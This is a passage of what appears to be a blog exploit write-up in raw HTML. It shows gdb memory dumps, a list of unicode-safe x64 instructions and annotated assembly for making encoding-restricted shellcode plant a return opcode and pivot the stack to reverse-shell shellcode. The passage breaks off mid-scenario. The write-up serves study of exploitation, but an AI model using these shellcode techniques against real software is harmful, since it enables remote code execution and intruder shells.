<span style="font-family: 'Courier New';">0x7fffffffe018:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00401228</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00000000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0xffffe060</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00007fff</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">0x7fffffffe028:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00000000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00000008</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00001000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00000000</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: red; font-family: 'Courier New';">0x7fffffffe038:</span><span class="Apple-tab-span" style="color: red; font-family: 'Courier New'; white-space: pre;"> </span><span style="color: red; font-family: 'Courier New';">0x00606a90</span><span class="Apple-tab-span" style="color: red; font-family: 'Courier New'; white-space: pre;"> </span><span style="color: red; font-family: 'Courier New';">0x00000000</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">(gdb) </span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
we found that there is malloc buffer pointer at [RSP+0x20].</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
below are some of the lists of ascii-unicode proof x64 instructions.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
(plus register PUSH/POP instructions)</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6036:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6039:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">sbb $0x1f001e00,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff603e:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6040:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rcx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6042:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6044:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6046:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6049:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">and $0x27002600,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff604e:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6050:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rcx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6052:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6054:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6056:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6059:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">sub $0x2f002e00,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff605e:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6060:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6062:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rcx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6064:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6066:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6068:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff606b:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">xor $0x37003600,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6070:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6072:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rcx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6074:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6076:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6078:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff607b:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">cmp $0x3f003e00,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6080:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,0x0(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6083:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,0x0(%r10)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6087:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,0x45(%r8,%r8,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff608c:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,0x0(%rsi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff608f:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">rex.RXB add %r9b,0x0(%r8)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6093:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">rex.WB add %cl,0x0(%r10)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6097:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">rex.WXB add %cl,0x4d(%r8,%r8,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff609c:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %cl,0x0(%rsi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff609f:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">rex.WRXB add %r10b,0x0(%r8)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60a3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60a4:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dl,0x0(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60a7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rbx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60a8:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dl,0x55(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ac:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dl,0x0(%rsi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60af:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rdi</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b0:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,0x0(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b4:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,0x0(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rbx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b8:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,0x5d(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60bc:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,0x0(%rsi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60bf:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rdi</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60c0:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,0x0(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60c3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">(bad) </span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60c4:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,0x0(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60c7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">movslq (%rax),%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;"> 0x7ffff7ff60c9:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;">add %ah,%fs:0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60cd:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">data16</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ce:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,0x0(%rdi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60d1:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pushq $0x6a006900</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60d6:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60d9:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">insb (%dx),%es:(%rdi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60da:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60dd:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">outsb %ds:(%rsi),(%dx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60de:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rdi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e1:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jo 0x7ffff7ff60e3</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jno 0x7ffff7ff60e5</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e5:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jb 0x7ffff7ff60e7</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jae 0x7ffff7ff60e9</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e9:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">je 0x7ffff7ff60eb</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60eb:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jne 0x7ffff7ff60ed</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ed:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jbe 0x7ffff7ff60ef</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ef:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">ja 0x7ffff7ff60f1</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f1:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">js 0x7ffff7ff60f3</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jns 0x7ffff7ff60f5</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f5:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jp 0x7ffff7ff60f7</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jnp 0x7ffff7ff60f9</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f9:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jl 0x7ffff7ff60fb</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60fb:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jge 0x7ffff7ff60fd</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60fd:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jle 0x7ffff7ff60ff</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ff:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jg 0x7ffff7ff6101</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"><br /></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
to sum up, we can use register PUSH/POP instructions, we can adjust the register value by </div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
pushing them and overwriting a byte into stack.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
with some clever combination of instructions we can write the return instruction at the end of unicode shellcode.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
and we were able to manage the RSP to point to normal reverse shellcode. see below.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<b><span style="font-family: 'Courier New';">0x7ffff7ff606b:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">xor $0x37003600,%eax</span></b></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<b><span style="font-family: 'Courier New';">0x7ffff7ff6070:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rax)</span></b></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
we can't XOR an arbitrary constant to a register but we can XOR a constant which contains zero at second, fourth byte. and we can also add ah, bh, ch, dh...(second bytes) register to a memory location pointed with RAX.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
we exploit the fact that </div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
1. we can put return instruction at the end of unicode shellcode.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
2. we can adjust ESP to point start of reverse shellcode.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
it's complex. but the following describes this scenario.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># set return opcode into bh</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">xor</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">$0x20002000, %eax # EAX: 20002000</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">sub</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-size: 9pt; line-height: 1.5;"><span style="color: #4c4c4c;">$0x30003000, %eax</span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"># EAX: EFFFF000</span></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">xor</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-size: 9pt; line-height: 1.5;"><span style="color: #4c4c4c;">$0x33003300, %eax</span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"># EAX: DCFFC300</span></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-size: 9pt; line-height: 1.5;"><span style="color: #4c4c4c;">%rbx</span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span></span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;"># EBX: DCFFC300. BH has value C3(ret)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># set RDX shellcode + X</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
